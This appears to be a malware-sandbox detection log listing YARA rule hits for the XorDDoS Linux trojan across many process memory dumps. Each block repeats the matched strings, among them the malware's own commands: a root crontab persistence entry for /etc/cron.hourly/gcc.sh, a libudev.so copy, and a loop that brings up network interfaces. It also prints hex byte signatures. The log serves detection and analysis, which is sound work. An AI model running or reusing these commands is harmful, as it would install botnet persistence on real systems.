6328.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6423.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6423.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6423.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6423.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6423.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6423.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6423.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6418.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6418.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6418.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6418.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6418.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6418.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6418.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6231.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6231.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6231.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6231.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6231.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6231.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6231.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6445.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6445.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6445.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6445.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6445.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6445.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6445.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6272.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6272.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6272.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6272.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6272.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6272.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6272.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6333.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6333.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6333.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6333.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6333.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6333.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6333.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6336.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6336.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6336.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6336.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6336.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6336.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6336.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6392.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6392.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6392.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6392.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6392.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6392.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6392.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6499.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6499.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6499.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6499.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6499.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6499.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6499.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6560.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6560.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6560.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6560.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6560.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6560.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6560.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6474.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6474.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6474.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6474.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6474.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6474.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6474.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6514.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6514.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6514.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6514.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6514.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6514.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6514.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6269.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6269.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6269.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6269.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6269.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6269.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6269.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6303.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6303.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6303.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6303.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6303.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6303.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
